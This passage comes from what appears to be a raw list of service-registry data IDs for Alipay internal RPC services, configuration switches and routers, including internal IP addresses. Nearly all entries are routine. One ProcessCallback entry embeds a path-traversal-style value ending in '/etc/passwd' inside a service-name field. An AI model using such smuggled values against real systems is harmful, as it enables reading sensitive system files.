sorprod.common.service.facade.api.LogUploadFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.income.common.service.facade.FeeOperationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_FDBUDGET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:autoaftermarketunit_sdk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:adcenter_pro_window_audit_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.BizStateResetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestJobManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.ChargeoffConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.BankAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@iothub#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.settlequery.common.service.facade.config.api.DepositbackApiStrategyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.loadTestModeSendBatchFinishMsgSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.facade.service.robot.RobotWarningFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.h5.H5FlowReportDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.i18n.facade.CapI18nService:1.0:antcloud_dmd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_MSGSEND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.64.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.142.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iaccenter.facade.manage.api.InstAccountingRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_XPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.grayHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.assettrans.facade.fabs.api.consult.AccountingConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbshopdecorate.common.service.facade.kbserv.decorate.DecorateComponentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.FixedOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.backend.service.facade.task.DepQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.assistant.api.AsrAssistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.core.service.gray.grayConfigDrmHandler.acceptanceRuleWhite,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.categorymng.facade.ClassifyRuleRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eindustrycenter.common.service.facade.mng.EindustryProviderSettleMngFacade:1.0:bizrecon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.period.TimePeriodOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:financingYebAsset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payflux.spi.BizDispatchServiceFacade:1.0:unitradeprodutc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.ApiManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.FactTableOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.SecondKillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprodapicore.facade.service.ClusterServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeAppCardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.service.facade.SupervisionFileMergeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopTaskInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.z.armng.common.service.facade.trans.ZarmngTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.coordinator.service.ConfigLoadService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:venuesp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcontentprod.facade.service.dynamic.ContentDefinitionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:gfacceptance.biz.unioncode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.PublishDashboardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_R_UIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.etetestcore.EteTestCoreCommonResource.caseIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:mwealthprod_tuition_account@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zproxyTestForJDK8:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algoevaluator.common.service.SimulationJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendDingDingService.sendDingDing:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcloanprod.common.service.facade.service.credit.CreditAcceptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditamount.service.PcreditAmountPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.common.service.facade.SampleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.common.service.client.MobileLoginAuthReadServiceNearClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.TagEntityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instanalysis.common.service.facade.route.RouterReplayServiceFacade:1.0:instanalysis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.agdsccalipay:name=com.alipay.agdscc.common.service.facade.selleradmitcache.SellerAdmitCacheSwitch.cacheMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.actagcore.facade.service.TagIntegrationFacade:1.0:region@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.dataquality.api.DqCtuEventManagerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cnamlmatrix#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.codeVoucherUseModeChangeAppListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbdatafactory.common.service.facade.DataGovRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaota.common.service.facade.ota.IotOtaManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.RuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.activity.ActivityApplyBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.analysis.AnalysisManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.clerk.manage.ClerkManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.privilege.service.DataColumnPrivilegeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.health.service.HealthPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.alive.ProdALiveFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:groot@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ARTVCROOM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountCacheManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.cacheStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@mirrorprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finrtcalcenter.common.service.facade.realtimedata.ViewModifyMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.manager.AppMngManager:1.0:antbuservice-global-antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:lokitwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acsubscriberprod.facade.service.SendEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lifemsgprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.issue.template.buyer.accept@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.event.EventRetryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_SHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yuyan.changecore.JobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservemng.service.facade.profit.api.AgreementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rulemng.common.service.facade.rule.DataSyncServie:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_OAPI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:asttshipcoreFluxInstrctionService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.trans.FinsTransOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataconsole.config.zcache.ZcacheBuildIdcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceQueryApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:reservecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.130.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:troublehunter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.rule.core.publish.drm.RulePublishResource.ruleModelConcurrentDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbdish.common.service.facade.api.manage.KbdishMaterialManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.sendResultInfoStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfodecision.common.service.facade.goods.GinGoodsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.cifin_customerEventDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_B_SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchprod.module.merchant.facade.api.sales.PurchaseQueryService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.creditusage.CreditLimitQuotaQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.useKycMock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:cashier@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.service.facade.api.RccenterScmDataManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insmobile.communityShardDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:inscheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/������������������������������������������������/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.drm.PsGrayDrm.keyPropertyCompatibilitySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumecenter.common.service.manager.facade.ConsumeProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincapacity.biz.facade.MoneyRollbackMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchselfop_antProcessCallbackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.subscribe.SubscribeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.DepartmentFacade:1.0:orgDepartmentFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.info.InfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.0.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.emcooperate.common.service.facade.dispatchPlatform.IcPlatformActionTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbscprod.common.facade.merchantOrder.MerchantOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.56.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.242.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocommopt.com.service.facade.api.SaleGiftPackageInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.config.CompanyConfigServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.common.AutoUserFeedbackFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:antsecurity_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.query.BaitiaoProdInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.PlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:mobileprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipaymo.momobilewallet.common.facade.sso.IpaySingleSignOnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.87.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.service.facade.CodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencommon.rcache.facade.RCacheClearQueueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.184.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:charge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.156.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:validSignContractHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.voucher.VcpVoucherPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBSALES#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocKbOrderCreateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.investment.InvestNameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.144.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fincore_cardbin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.BankCardDrmResource.bizSysPermission,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mpromocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityMiniProjectMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.137.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finslip.common.service.facade.recon.ReconBatchAdjustService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.confirmHour,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.ps.rpc.facade.UserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.XiaobaoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.ProducerUserService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CUSTCPT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.174.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.177.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.updateCpmMgmtRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.15.248.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cardbin:name=com.alipay.cardbin.ldctair.switch.isReadFromLdcTair,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.127.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:publiccoreRisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finmng.service.facade.ctrl.FinmngProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilewealth.adapterservice.MobileWealthAdapterService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.transfer.JssAlarmTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.220.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.235.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.component.ComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:pledgecoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_devicemtn_sendRecycledFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloancollection_workflow_service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.CtuMetaObjectClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.voting.VotingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authprod.facade.account.AccountLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.ChangeRiskAssessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers__SAMPLETOPIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcic.service.facade.dmc.TitanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.api.common.OliveValidationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.ptcore.common.service.facade.api.optlog.OperationLogServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.crowd.CrowdAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.sync.PdfSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.publish.PublishApi:1.0:dppublishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheSwitchDRM.cacheLoadSourceDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ProductUpgradeBaseInfoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:opssla@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.daemon.event.drm.BankCardAsyncCompensateDrmResource.coreThreadPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.ExecutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbretailprod.common.facade.mall.homepage.MallCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.budgetcore.common.service.facade.query.BudgetAmountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.client.SystemAppInvokeService:1.0:trafficintelbiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gftms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchdtunical.common.service.facade.DtMonitorFacade:1.0@DEFAULT#@